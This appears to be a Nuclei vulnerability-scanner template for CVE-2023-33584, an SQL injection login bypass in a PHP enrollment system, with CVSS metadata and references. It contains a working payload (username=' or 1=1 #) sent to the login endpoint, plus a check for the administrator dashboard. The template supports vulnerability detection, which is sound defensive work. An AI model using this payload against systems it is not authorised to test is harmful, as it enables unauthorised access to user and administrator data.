id: CVE-2023-33584 info: name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass author: r3Y3r53 severity: critical description: | Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system. reference: - https://www.exploit-db.com/exploits/51501 - https://nvd.nist.gov/vuln/detail/CVE-2023-33584 - https://packetstormsecurity.com/files/cve/CVE-2023-33584 - https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-33584 cwe-id: CWE-89 epss-score: 0.05622 epss-percentile: 0.92535 cpe: cpe:2.3:a:enrollment_system_project:enrollment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: enrollment_system_project product: enrollment_system tags: cve2023,cve,packetstorm,sqli,exploitdb,unauth,enrollment,enrollment_system_project http: - raw: - | POST /enrollment/ajax.php?action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username='+or+1%3D1+%23&password={{randstr}} - | GET /enrollment/index.php?page=home HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")' - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and # digest: 4a0a00473045022100d92fe2f3b88a43f09bd562da512dbe3ac9126ca89556e975743d69c63d184cbd0220343343c309427c6671a195932b6c4eca060d5eae5490ca528e75617c05dc2eec:922c64590222798bb761d5b6d8e72950